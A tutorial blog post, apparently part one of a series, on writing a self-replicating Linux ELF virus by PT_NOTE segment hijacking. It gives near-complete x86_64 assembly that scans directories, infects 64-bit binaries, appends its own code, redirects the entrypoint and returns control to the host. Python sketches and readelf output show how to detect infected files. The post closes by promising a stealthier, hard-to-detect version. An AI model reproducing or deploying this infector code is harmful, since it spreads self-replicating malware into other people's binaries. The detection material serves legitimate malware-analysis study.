Infectors: how to make a simple self-replicating program on Linux.

Introduction

In this post, we will learn how to write a simple ELF infector for Linux. The infector spreads by self-replicating into the other binaries it finds, and it runs again whenever an infected binary is launched so that it can spread further. The payload is harmless: just a signature attesting that the binary has been infected. The infector is very basic and makes no attempt at disguise; any reverse engineer can tell that a file has been infected by running a simple readelf command (more on that later).

You can check the full source code here

How does it work?

The technique we will use here is called PT_NOTE segment hijacking. To understand how it works, we first need to understand the ELF format. An ELF file starts with the ELF header, which gives us the information we need to read the rest of the file. Then comes the program header table, which describes how the file is organized into segments. Each program header describes one part of the file, and a given part can be covered by several program headers. Each entry is described by the following C structure (see man elf for more information).

 typedef struct {
               uint32_t   p_type;
               uint32_t   p_flags;
               Elf64_Off  p_offset;
               Elf64_Addr p_vaddr;
               Elf64_Addr p_paddr;
               uint64_t   p_filesz;
               uint64_t   p_memsz;
               uint64_t   p_align;
           } Elf64_Phdr;

The p_type field describes what kind of program header it is. Two types interest us:

PT_LOAD: The array element specifies a loadable segment, described by p_filesz and p_memsz. The bytes from the file are mapped to the beginning of the memory segment. If the segment's memory size p_memsz is larger than the file size p_filesz, the "extra" bytes are defined to hold the value 0 and to follow the segment's initialized area. The file size may not be larger than the memory size. Loadable segment entries in the program header table appear in ascending order, sorted on the p_vaddr member.
PT_NOTE: The array element specifies the location of notes (ElfN_Nhdr).

PT_LOAD segments are loaded into memory, which means that with the right permissions we can execute their content. A PT_NOTE segment simply gives the location of notes that the program does not need during its execution. Binaries compiled the usual way normally contain a PT_NOTE segment. The technique consists of changing this PT_NOTE segment into a PT_LOAD segment pointing to the end of the file, where we will put our code. This way, our code gets mapped into memory without altering the file too much, and we will be able to execute it.
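
To make the structure above more concrete, here is a minimal Python sketch that decodes one 64-bit program header entry. It is only an illustration: the names PHDR_FORMAT, PHDR_FIELDS and parse_phdr are made up for this example, and the sample bytes are rebuilt from the NOTE entry of the readelf output shown at the end of this post.

```python
import struct

# Elf64_Phdr layout from `man elf`: two uint32 fields, then six 64-bit fields.
PHDR_FORMAT = "<IIQQQQQQ"          # little-endian, 56 bytes in total
PHDR_FIELDS = ("p_type", "p_flags", "p_offset", "p_vaddr",
               "p_paddr", "p_filesz", "p_memsz", "p_align")
PT_LOAD, PT_NOTE = 1, 4            # p_type values from <elf.h>
PF_R = 4                           # read permission flag


def parse_phdr(raw: bytes) -> dict:
    """Decode one 64-bit program header entry into a field dictionary."""
    return dict(zip(PHDR_FIELDS, struct.unpack(PHDR_FORMAT, raw)))


# Synthetic entry mirroring the NOTE line of the sample binary (assumption:
# rebuilt by hand from the readelf values, not read from a real file).
note_raw = struct.pack(PHDR_FORMAT, PT_NOTE, PF_R, 0x2c4, 0x2c4, 0x2c4, 0x44, 0x44, 0x4)
note = parse_phdr(note_raw)
print(note["p_type"] == PT_NOTE, hex(note["p_offset"]), hex(note["p_filesz"]))
```

On a real file, the entries would be read starting at the e_phoff offset given by the ELF header, one every e_phentsize bytes.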

To execute it, we need to look a bit more closely at the ELF header structure, defined as:

#define EI_NIDENT 16

           typedef struct {
               unsigned char e_ident[EI_NIDENT];
               uint16_t      e_type;
               uint16_t      e_machine;
               uint32_t      e_version;
               ElfN_Addr     e_entry;
               ElfN_Off      e_phoff;
               ElfN_Off      e_shoff;
               uint32_t      e_flags;
               uint16_t      e_ehsize;
               uint16_t      e_phentsize;
               uint16_t      e_phnum;
               uint16_t      e_shentsize;
               uint16_t      e_shnum;
               uint16_t      e_shstrndx;
           } ElfN_Ehdr;

The field that interests us here is e_entry, which defines the entrypoint of the program. If we put the address of our code there, the program will execute it first, and we will just have to transfer execution back to the original entrypoint so that the program can carry on as usual.
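
As a rough illustration of how these fields can be read, the following Python sketch decodes a 64-bit little-endian ELF header. The helper name parse_ehdr is hypothetical, and the sample header is synthetic: it only mirrors the values readelf reports for the Hello World binary used later (type DYN, entrypoint 0x1050, 11 program headers at offset 64), with the section-related fields zeroed as an assumption.

```python
import struct

EHDR_FORMAT = "<16sHHIQQQIHHHHHH"   # Elf64_Ehdr, little-endian, 64 bytes
EHDR_FIELDS = ("e_ident", "e_type", "e_machine", "e_version", "e_entry",
               "e_phoff", "e_shoff", "e_flags", "e_ehsize", "e_phentsize",
               "e_phnum", "e_shentsize", "e_shnum", "e_shstrndx")


def parse_ehdr(raw: bytes) -> dict:
    """Decode the first 64 bytes of a 64-bit little-endian ELF file."""
    return dict(zip(EHDR_FIELDS, struct.unpack(EHDR_FORMAT, raw[:64])))


# e_ident: magic, ELFCLASS64 (2), ELFDATA2LSB (1), EV_CURRENT (1), then padding.
ident = b"\x7fELF" + bytes([2, 1, 1]) + bytes(9)
# Synthetic header: ET_DYN (3), EM_X86_64 (62), entry 0x1050, 11 phdrs at offset 64.
sample = struct.pack(EHDR_FORMAT, ident, 3, 62, 1, 0x1050, 64, 0, 0, 64, 56, 11, 64, 0, 0)

hdr = parse_ehdr(sample)
print(hex(hdr["e_entry"]), hdr["e_phoff"], hdr["e_phnum"])
```

For a file on disk, the same function could be fed the first 64 bytes read in binary mode.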

The code

Filesystem reading

The first thing to do is to find files to infect. For safety reasons, and because we don’t want to run our program as root, we will not look for them in /bin or /usr/bin but in /tmp/test and /tmp/test2.

_start:
    push    rbp
    mov     rbp, rsp
    sub     rsp, 0x10
    lea     rdi, [rel cwd]
    mov     rsi, O_DIRECTORY | O_RDONLY
    xor     eax, eax
    add     al, SYS_OPEN
    syscall
    mov     [rsp], eax      ; We open and save the fd of the cwd so that we will be able
                            ; to chdir back to it after we are done

    lea     rdi, [rel dir1] ; /tmp/test
    call    readdir
    lea     rdi, [rel dir2] ; /tmp/test2
    call    readdir

    mov     edi, [rsp]
    xor     eax, eax
    add     al, SYS_FCHDIR
    syscall                 ; Back to our initial cwd to not break the executed binary (eg. ls)
    mov     edi, [rsp]
    xor     eax, eax
    add     eax, SYS_CLOSE
    syscall

    leave

This code chunk calls the readdir function, which we use to go through the files in both target directories. We want to open those files with relative paths to avoid string operations, which are a bit painful in ASM, so we chdir into each directory first. To avoid breaking the infected program (eg. ls), our first step is to open the current working directory so that we can get back to it once the job is done.

readdir:
    push    rbp
    mov     rbp, rsp
    sub     rsp, 0x20
    mov     eax, SYS_CHDIR  ; Let's change the directory to open file,
                            ; string operations are painful in ASM so relative paths will do
    syscall

    mov     rsi, O_DIRECTORY | O_RDONLY
    xor     eax, eax
    add     eax, SYS_OPEN
    syscall
    mov     [rsp], eax

    xor     rdi, rdi
    mov     rsi, 0x1000
    add     rdx, PROT_READ | PROT_WRITE
    mov     r10, MAP_ANONYMOUS | MAP_PRIVATE
    xor     r8, r8
    dec     r8
    xor     r9, r9
    xor     eax, eax
    add     al, SYS_MMAP
    syscall                 ; We map a page for the getdents buffer

    test    al, al
    jnz     end_readdir
    mov     [rsp + 0x8], rax

loop_dir:
    mov     edi, [rsp]
    mov     rsi, [rsp + 0x8]
    mov     rdx, DIRENT_MAX_SIZE
    xor     eax, eax
    add     al, SYS_GETDENTS64
    syscall
    cmp     eax, 0

    jle     end_readdir
    mov     [rsp + 0x4], eax
    xor     r8, r8

loop_buf_dirent:
    mov     [rsp + 0x10], r8w
    mov     r9, [rsp + 0x8]
    cmp     BYTE [r9 + r8 + d_type], DT_REG
    jne     next_dirent
    lea     rdi, [r9 + r8 + d_name]
    call    infect          ; We only infect regular files 

next_dirent:
    mov     r9, [rsp + 0x8]
    movzx   r8, WORD [rsp + 0x10]
    add     r8w, [r9 + r8 + d_reclen]
    cmp     r8w, [rsp + 4]
    jl      loop_buf_dirent
    jmp     loop_dir

end_readdir:
    mov     edi, [rsp]
    xor     eax, eax
    add     eax, SYS_CLOSE
    syscall

    mov     rdi, [rsp + 0x8]
    mov     rsi, 0x1000
    mov     eax, SYS_MUNMAP
    syscall
    leave
    ret

With the readdir function, we will loop through all the linux_dirent64 structures present in each of the target directories. If the current structure describes a regular file, we will call the infect function with its name as argument to try to infect it.
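
The record walk performed by loop_buf_dirent can be sketched in Python as follows. This is an illustration only: regular_files and make_dirent are hypothetical helpers, and the buffer is built by hand instead of coming from a real getdents64 call. The field offsets follow the linux_dirent64 layout (d_ino, d_off, d_reclen, d_type, then the NUL-terminated d_name).

```python
import struct

DT_DIR, DT_REG = 4, 8              # d_type values from <dirent.h>
DIRENT_HEADER = "<QqHB"            # d_ino, d_off, d_reclen, d_type
D_NAME_OFFSET = struct.calcsize(DIRENT_HEADER)   # d_name starts at byte 19


def regular_files(buf: bytes) -> list:
    """Return the names of the DT_REG entries found in a getdents64-style buffer."""
    names, pos = [], 0
    while pos + D_NAME_OFFSET <= len(buf):
        _ino, _off, reclen, d_type = struct.unpack_from(DIRENT_HEADER, buf, pos)
        if reclen == 0:            # malformed record, stop instead of looping forever
            break
        raw_name = buf[pos + D_NAME_OFFSET:pos + reclen]
        if d_type == DT_REG:
            names.append(raw_name.split(b"\0", 1)[0].decode())
        pos += reclen              # d_reclen gives the distance to the next record
    return names


def make_dirent(name: str, d_type: int) -> bytes:
    """Build one synthetic record, padded to a multiple of 8 bytes."""
    body = name.encode() + b"\0"
    reclen = (D_NAME_OFFSET + len(body) + 7) & ~7
    header = struct.pack(DIRENT_HEADER, 1, 0, reclen, d_type)
    return (header + body).ljust(reclen, b"\0")


buf = make_dirent(".", DT_DIR) + make_dirent("hello", DT_REG) + make_dirent("sub", DT_DIR)
print(regular_files(buf))
```

Only the entry marked DT_REG is returned, which matches the "regular files only" filter of the assembly loop.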

Preliminary checks

The infect function is the main function of our program. To make the code cleaner, I’ve defined a structure called Infection_struct in defines.s. By treating the stack frame as an instance of this structure, I can use its fields as local variable names.

infect:
    push    rbp
    mov     rbp, rsp
    sub     rsp, INFECTOR_STRUCT_SIZE

    mov     esi, O_RDWR
    mov     eax, SYS_OPEN
    syscall
    cmp     eax, 0
    jl      quit_infect

    mov     [rsp + inf_fd], eax
    mov     edi, [rsp + inf_fd]
    lea     rsi, [rsp + inf_elfhdr]
    mov     rdx, ELFHDR_SIZE
    mov     eax, SYS_READ
    syscall

    lea     rbx, [rsp + inf_elfhdr]
    lea     rax, [rbx + e_ident]
    cmp     [rax], DWORD ELF_MAGIC
    jne     close_quit_infect
    cmp     [rax + EI_CLASS], BYTE ELFCLASS64
    jne     close_quit_infect
    cmp     [rax + EI_DATA], BYTE ELFDATA2LSB       ; Only ELF 64 bits are being taken into account
    jne     close_quit_infect
    cmp     [rax + EI_PAD], DWORD INFECTION_MAGIC   ; We check them to avoid double infection
    je      close_quit_infect

    mov     rdx, [rax + e_phnum]
    test    rdx, rdx
    je      close_quit_infect
    mov     ax, [rbx + e_type]
    cmp     ax, ET_EXEC
    je      right_type_check
    cmp     ax, ET_DYN
    jne     close_quit_infect

The first part of this function is just about parsing the ELF header to check for several things:

The file is a valid ELF file
It is either an executable file or a shared object file
It has not been infected yet

Since reinfecting a file is useless and wasteful, we will prevent that from happening. In the e_ident field of the ELF header, there are some padding bytes that are unused and zero-filled. We will put an infection marker there to keep track of the binaries that are already infected.
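
Seen from the analyst's side, the same checks can be turned into a small scanner. The sketch below is a hedged illustration in Python: classify and sample_header are hypothetical names, and MARKER is a placeholder, since the actual INFECTION_MAGIC value lives in defines.s and is not shown in this post.

```python
ELF_MAGIC = b"\x7fELF"
EI_CLASS, EI_DATA, EI_PAD = 4, 5, 9      # indexes into e_ident
ELFCLASS64, ELFDATA2LSB = 2, 1
ET_REL, ET_EXEC, ET_DYN = 1, 2, 3
E_TYPE_OFF, E_PHNUM_OFF = 16, 56         # field offsets inside Elf64_Ehdr
MARKER = b"INF!"                         # hypothetical marker, NOT the real value


def classify(header: bytes) -> str:
    """Apply the same header checks as the infect routine, in the same spirit."""
    if len(header) < 64 or header[:4] != ELF_MAGIC:
        return "not-elf"
    if header[EI_CLASS] != ELFCLASS64 or header[EI_DATA] != ELFDATA2LSB:
        return "unsupported"
    e_type = int.from_bytes(header[E_TYPE_OFF:E_TYPE_OFF + 2], "little")
    e_phnum = int.from_bytes(header[E_PHNUM_OFF:E_PHNUM_OFF + 2], "little")
    if e_type not in (ET_EXEC, ET_DYN) or e_phnum == 0:
        return "unsupported"
    if header[EI_PAD:EI_PAD + len(MARKER)] == MARKER:
        return "marked"                  # padding bytes carry the marker
    return "clean"


def sample_header(e_type=ET_DYN, phnum=11, marker=b"") -> bytes:
    """Build a synthetic 64-byte header for demonstration purposes."""
    hdr = bytearray(64)
    hdr[0:4] = ELF_MAGIC
    hdr[EI_CLASS], hdr[EI_DATA] = ELFCLASS64, ELFDATA2LSB
    hdr[EI_PAD:EI_PAD + len(marker)] = marker
    hdr[E_TYPE_OFF:E_TYPE_OFF + 2] = e_type.to_bytes(2, "little")
    hdr[E_PHNUM_OFF:E_PHNUM_OFF + 2] = phnum.to_bytes(2, "little")
    return bytes(hdr)


print(classify(sample_header()), classify(sample_header(marker=MARKER)))
```

Because the padding bytes are expected to be zero, any non-zero value there is worth a second look, whatever the marker happens to be.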

right_type_check:
    mov     edi, [rsp + inf_fd]
    xor     rsi, rsi
    mov     rdx, SEEK_END
    mov     eax, SYS_LSEEK
    syscall
    mov     [rsp + inf_filesize], rax

    mov     rsi, rax
    xor     rdi, rdi
    mov     rdx, PROT_READ | PROT_WRITE
    mov     r10, MAP_SHARED
    mov     r8d, [rsp + inf_fd]
    xor     r9, r9
    mov     eax, SYS_MMAP
    syscall                     ; We map the file into memory to operate on it
    test    al, al

    jnz     close_quit_infect
    mov     [rsp + inf_map], rax

    mov     [rax + e_ident + EI_PAD], DWORD INFECTION_MAGIC ; Mark binary for infection
    mov     QWORD [rsp + inf_notehdr], 0

    mov     r8, rax
    add     r8, [rax + e_phoff]
    movzx   rcx, WORD [rax + e_phnum]
loop_phdrs:
    cmp     [r8 + p_type], DWORD PT_NOTE
    jne     cmp_load_phdr
    mov     QWORD [rsp + inf_notehdr], r8
cmp_load_phdr:
    cmp     [r8 + p_type], DWORD PT_LOAD
    jne     next_phdr
    mov     QWORD [rsp + inf_last_pt_load], r8
next_phdr:
    add     r8w, [rax + e_phentsize]
    loop    loop_phdrs

check_if_note_exists:
    mov     rax, [rsp + inf_notehdr]
    test    rax, rax
    jz      munmap_quit_infect

This next code chunk maps the file into memory and gathers some information that will be useful for the infection routine, such as:

the file size
the PT_NOTE phdr address
the last PT_LOAD phdr address

Infection

Once we have all the information we need, we can get to the serious part.

patch_note_phdr:
    mov     rax, [rsp + inf_notehdr]
    mov     [rax + p_type], DWORD PT_LOAD       ; We make it loadable
    mov     [rax + p_flags], DWORD PF_R | PF_X  ; And executable
    mov     rdx, QWORD [rsp + inf_filesize]     ; It starts at the EOF
    mov     QWORD [rax + p_offset], rdx
    mov     QWORD [rax + p_filesz], virus_len   ; We update the sizes
    mov     QWORD [rax + p_memsz], virus_len
    mov     QWORD [rax + p_align], 0x1000       ; And the alignment

    mov     rdx, [rsp + inf_last_pt_load]
    mov     rcx, [rdx + p_vaddr]                ; we get the last page used
    and     cx, 0xf000                          ; we align the address on page border
    add     rcx, [rsp + inf_filesize]           ; and we add the file size to it so that
                                                ; it will be on another page and also to keep
                                                ; offset and address consistent

    mov     [rax + p_vaddr], rcx                ; We put it after the last address mapped into memory
    mov     [rax + p_paddr], rcx                ; but we have to align it on another page

    sub     rax, [rsp + inf_map]                ; We convert our infected segment's address to
    mov     [rsp + inf_notehdr], rax            ; an offset in case remapping changes the map address

This is the code that handles the PT_NOTE hijacking. If we want our code to execute, the new PT_LOAD header must be valid, so we have to change many of its fields.

p_type: We switch it from PT_NOTE to PT_LOAD to tell the system that we want our code mapped into memory.
p_flags: For PT_LOAD segments, this field defines the permissions granted to the segment. We give it read and execute permissions because that’s all it needs.
p_offset: This field defines where the segment starts in the file. Since we are going to put our code at the end of the file, we put the file size here.
p_filesz / p_memsz: These tell the system how much space to reserve in memory and how many bytes of the file to copy into it. We set both to the virus length (we will see how to get it later).
p_paddr / p_vaddr: These are the physical and virtual addresses where the segment will be mapped. The man page says that "Loadable process segments must have congruent values for p_vaddr and p_offset, modulo the page size", so we take the page-aligned address of the last existing PT_LOAD and add the file size to it. Since p_offset is also the file size, the offset and the addresses are guaranteed to be congruent.
p_align: Loadable segments are aligned on memory pages, so we change it to the usual page size (0x1000 bytes).
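
The congruence rule is easy to check by hand on the sample binary used at the end of this post. The Python sketch below replays the address computation with the values readelf reports (last PT_LOAD at 0x3de8, original file size 0x40e0). The function names are made up for the example, and it only mirrors the arithmetic described above; it makes no attempt to verify that the resulting range is free of other mappings.

```python
PAGE_SIZE = 0x1000


def new_segment_vaddr(last_load_vaddr: int, file_size: int) -> int:
    """Page-align the last PT_LOAD address, then add the original file size."""
    return (last_load_vaddr & ~(PAGE_SIZE - 1)) + file_size


def is_congruent(p_vaddr: int, p_offset: int) -> bool:
    """Check the rule from `man elf`: p_vaddr == p_offset modulo the page size."""
    return p_vaddr % PAGE_SIZE == p_offset % PAGE_SIZE


last_load_vaddr = 0x3de8          # VirtAddr of the last LOAD in the readelf output
file_size = 0x40e0                # Offset of the hijacked segment, i.e. the old EOF

vaddr = new_segment_vaddr(last_load_vaddr, file_size)
print(hex(vaddr), is_congruent(vaddr, file_size))
```

The result, 0x70e0, is the VirtAddr that readelf displays for the extra LOAD segment of the infected binary, and both values share the same low 12 bits (0x0e0).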

adjust_file_size:
    mov     edi, [rsp + inf_fd]
    mov     rsi, [rsp + inf_filesize]
    add     rsi, virus_len
    mov     QWORD [rsp + inf_new_filesize], rsi
    mov     eax, SYS_FTRUNCATE
    syscall
    test    eax, eax
    jnz     munmap_quit_infect

    mov     rdi, [rsp + inf_map]
    mov     rsi, [rsp + inf_filesize]
    mov     rdx, [rsp + inf_new_filesize]
    xor     r10, r10
    add     r10b, MREMAP_MAYMOVE
    mov     eax, SYS_MREMAP
    syscall
    test    al, al
    jnz     munmap_quit_infect
    mov     [rsp + inf_map], rax            ; This might break the reference to the phdrs
                                            ; but they are not needed anymore
    mov     rdi, [rsp + inf_map]
    add     rdi, [rsp + inf_filesize]
    lea     rsi, [rel _start]
    mov     rcx, virus_len

copy_payload:
    lodsb
    stosb
    loop    copy_payload

patch_entrypoint:
    mov     r8, [rsp + inf_map]
    mov     rax, r8
    add     rax, [rsp + inf_notehdr]
    mov     rdx, [r8 + e_entry]          ; We save the old entrypoint
    mov     rcx, [rax + p_vaddr]
    mov     QWORD [r8 + e_entry], rcx    ; We change the entrypoint to our code
    add     rcx, final_jmp_offset        ; The address to patch
    sub     rdx, rcx                     ; We have the relative jump
    mov     rcx, [rax + p_offset]
    add     rcx, r8
    add     rcx, final_jmp_offset - 4    ; The file offset of the address to patch
    mov     DWORD [rcx], edx             ; We return to the original entrypoint

munmap_quit_infect:
    mov     rdi, [rsp + inf_map]
    mov     rsi, [rsp + inf_filesize]
    mov     eax, SYS_MSYNC
    syscall

    mov     rdi, [rsp + inf_map]
    mov     rsi, [rsp + inf_filesize]
    mov     eax, SYS_MUNMAP
    syscall

close_quit_infect:
    mov     edi, [rsp + inf_fd]
    mov     eax, SYS_CLOSE
    syscall

quit_infect:
    leave
    ret

    signature: db 0, SIGNATURE, 0
    dir1: db "/tmp/test/", 0
    dir2: db "/tmp/test2/", 0
    cwd: db ".", 0

_end:
    xor     rdi, rdi
    mov     eax, SYS_EXIT
    syscall

Once our new segment has been created, it is time to put the code inside the file. Since we are working with a memory-mapped file, we first extend the file with ftruncate and then remap it so that the mapping covers the new size. Once this is done, we go to the previous end of the file and copy the payload there. To get the size of our payload, we use the _end label placed at the end of the code, so that virus_len can be defined as _end - _start.

Once our payload has been copied, the last step is to hijack the control flow to get it executed. To do that we will first add the following lines to _start:

    jmp     _end
final_jmp_offset equ $ - _start

With this line, the program cleanly quits after its first execution. We can also reuse this jmp to jump back to the original entrypoint after the virus has run. In x86_64 assembly, a near jump is encoded as an opcode followed by a 32-bit offset relative to the address of the next instruction, which is what the final_jmp_offset label marks. We can obtain this offset with the formula: old_entrypoint_address - (new_segment_address + final_jmp_offset). Once we have replaced the jmp offset in the copied code, everything is set, but there is still one thing to do for the infector to fully work: preserve the registers. Indeed, the host program might expect specific values in some of the registers we used (like argc and argv in rdi and rsi), so we push those important registers at the very beginning of our program and pop them just before the final jump.
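
The relative-offset arithmetic works in both directions, which is handy when analyzing a sample: from the 4 patched bytes one can recover the original entrypoint. Here is a small Python sketch of that relation. The helper names are hypothetical, the value chosen for final_jmp_offset is an arbitrary placeholder, and it assumes the jump is assembled in its near form with a 32-bit displacement.

```python
import struct


def rel32(target: int, next_insn_addr: int) -> bytes:
    """Encode the signed 32-bit displacement of a near jmp, little-endian."""
    disp = target - next_insn_addr
    if not -2**31 <= disp < 2**31:
        raise ValueError("target is out of range for a rel32 jump")
    return struct.pack("<i", disp)


def jmp_target(next_insn_addr: int, disp_bytes: bytes) -> int:
    """Recover the jump target from the displacement bytes found in the file."""
    return next_insn_addr + struct.unpack("<i", disp_bytes)[0]


old_entry = 0x1050                 # entrypoint of the clean sample binary
segment_vaddr = 0x70e0             # address of the hijacked segment
final_jmp_offset = 0x20            # placeholder: the real value depends on _start

next_insn = segment_vaddr + final_jmp_offset
patched = rel32(old_entry, next_insn)
print(patched.hex(), hex(jmp_target(next_insn, patched)))
```

The displacement is negative here because the original entrypoint sits at a lower address than the appended code.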

Conclusion

We can now infect any 64-bit ELF on our system and make it execute anything we want if we insert a real payload, but we have a problem: our technique is not stealthy at all, and it can be spotted with readelf.

readelf is a Linux command that allows us to inspect ELF files. We will use it with the -l option to display the program headers of a simple Hello World written in C, before and after infection.

Elf file type is DYN (Shared object file)
Entry point 0x1050
There are 11 program headers, starting at offset 64

Program Headers:
  Type           Offset             VirtAddr           PhysAddr
                 FileSiz            MemSiz              Flags  Align
  PHDR           0x0000000000000040 0x0000000000000040 0x0000000000000040
                 0x0000000000000268 0x0000000000000268  R      0x8
  INTERP         0x00000000000002a8 0x00000000000002a8 0x00000000000002a8
                 0x000000000000001c 0x000000000000001c  R      0x1
      [Requesting program interpreter: /lib64/ld-linux-x86-64.so.2]
  LOAD           0x0000000000000000 0x0000000000000000 0x0000000000000000
                 0x0000000000000560 0x0000000000000560  R      0x1000
  LOAD           0x0000000000001000 0x0000000000001000 0x0000000000001000
                 0x00000000000001bd 0x00000000000001bd  R E    0x1000
  LOAD           0x0000000000002000 0x0000000000002000 0x0000000000002000
                 0x0000000000000158 0x0000000000000158  R      0x1000
  LOAD           0x0000000000002de8 0x0000000000003de8 0x0000000000003de8
                 0x0000000000000248 0x0000000000000250  RW     0x1000
  DYNAMIC        0x0000000000002df8 0x0000000000003df8 0x0000000000003df8
                 0x00000000000001e0 0x00000000000001e0  RW     0x8
  NOTE           0x00000000000002c4 0x00000000000002c4 0x00000000000002c4
                 0x0000000000000044 0x0000000000000044  R      0x4
  GNU_EH_FRAME   0x0000000000002014 0x0000000000002014 0x0000000000002014
                 0x000000000000003c 0x000000000000003c  R      0x4
  GNU_STACK      0x0000000000000000 0x0000000000000000 0x0000000000000000
                 0x0000000000000000 0x0000000000000000  RW     0x10
  GNU_RELRO      0x0000000000002de8 0x0000000000003de8 0x0000000000003de8
                 0x0000000000000218 0x0000000000000218  R      0x1

This is what a normal file looks like: it has 4 load segments, only one of which is executable (the code) and only one of which is writable (the data). It also has a NOTE header that points to the notes about the program.

After the infection, it looks more like this:

Elf file type is DYN (Shared object file)
Entry point 0x70e0
There are 11 program headers, starting at offset 64

Program Headers:
  Type           Offset             VirtAddr           PhysAddr
                 FileSiz            MemSiz              Flags  Align
  PHDR           0x0000000000000040 0x0000000000000040 0x0000000000000040
                 0x0000000000000268 0x0000000000000268  R      0x8
  INTERP         0x00000000000002a8 0x00000000000002a8 0x00000000000002a8
                 0x000000000000001c 0x000000000000001c  R      0x1
      [Requesting program interpreter: /lib64/ld-linux-x86-64.so.2]
  LOAD           0x0000000000000000 0x0000000000000000 0x0000000000000000
                 0x0000000000000560 0x0000000000000560  R      0x1000
  LOAD           0x0000000000001000 0x0000000000001000 0x0000000000001000
                 0x00000000000001bd 0x00000000000001bd  R E    0x1000
  LOAD           0x0000000000002000 0x0000000000002000 0x0000000000002000
                 0x0000000000000158 0x0000000000000158  R      0x1000
  LOAD           0x0000000000002de8 0x0000000000003de8 0x0000000000003de8
                 0x0000000000000248 0x0000000000000250  RW     0x1000
  DYNAMIC        0x0000000000002df8 0x0000000000003df8 0x0000000000003df8
                 0x00000000000001e0 0x00000000000001e0  RW     0x8
  LOAD           0x00000000000040e0 0x00000000000070e0 0x00000000000070e0
                 0x000000000000038a 0x000000000000038a  R E    0x1000
  GNU_EH_FRAME   0x0000000000002014 0x0000000000002014 0x0000000000002014
                 0x000000000000003c 0x000000000000003c  R      0x4
  GNU_STACK      0x0000000000000000 0x0000000000000000 0x0000000000000000
                 0x0000000000000000 0x0000000000000000  RW     0x10
  GNU_RELRO      0x0000000000002de8 0x0000000000003de8 0x0000000000003de8
                 0x0000000000000218 0x0000000000000218  R      0x1

We can now see that there is another load segment with execute permission. It looks very odd and should not be there at all. We can also notice that the NOTE segment has disappeared. Another odd thing is that the entrypoint points into that new segment. In a binary like this one, the code segment is mapped at 0x1000 and the entrypoint sits near its beginning, so 0x70e0 definitely doesn’t look legit. This is how you can tell that this file is not legitimate and probably infected, without even needing to analyze it properly.
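
These observations can be turned into a rough triage script. The following Python sketch encodes the three red flags as heuristics and runs them on the two program header tables shown above (only the LOAD and NOTE entries are reproduced). The names Phdr and red_flags are made up for this example, and the checks are heuristics only: a legitimate binary can lack a NOTE segment or have an unusual layout, so a hit means "look closer", not "infected".

```python
from collections import namedtuple

PT_LOAD, PT_NOTE = 1, 4
PF_X, PF_W, PF_R = 1, 2, 4

Phdr = namedtuple("Phdr", "p_type p_flags p_offset p_vaddr p_filesz p_memsz")


def red_flags(entry: int, phdrs: list) -> list:
    """Return the list of suspicious traits found in a program header table."""
    flags = []
    loads = [p for p in phdrs if p.p_type == PT_LOAD]
    if not any(p.p_type == PT_NOTE for p in phdrs):
        flags.append("no PT_NOTE segment")
    if sum(1 for p in loads if p.p_flags & PF_X) > 1:
        flags.append("more than one executable PT_LOAD")
    if loads:
        last = max(loads, key=lambda p: p.p_vaddr)
        if last.p_vaddr <= entry < last.p_vaddr + last.p_memsz:
            flags.append("entrypoint inside the last PT_LOAD")
    return flags


common = [
    Phdr(PT_LOAD, PF_R, 0x0, 0x0, 0x560, 0x560),
    Phdr(PT_LOAD, PF_R | PF_X, 0x1000, 0x1000, 0x1bd, 0x1bd),
    Phdr(PT_LOAD, PF_R, 0x2000, 0x2000, 0x158, 0x158),
    Phdr(PT_LOAD, PF_R | PF_W, 0x2de8, 0x3de8, 0x248, 0x250),
]
before = common + [Phdr(PT_NOTE, PF_R, 0x2c4, 0x2c4, 0x44, 0x44)]
after = common + [Phdr(PT_LOAD, PF_R | PF_X, 0x40e0, 0x70e0, 0x38a, 0x38a)]

print(red_flags(0x1050, before))
print(red_flags(0x70e0, after))
```

The clean table raises no flag, while the infected one raises all three.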

Lucky for us, we are gonna learn how to make an infector that will not induce any peculiar change in the ELF file structure. It will keep the original entrypoint and it will not change the number of load segments nor their permissions.

Part 2. Advanced infectors: How to make our infector stealthy and hardly detectable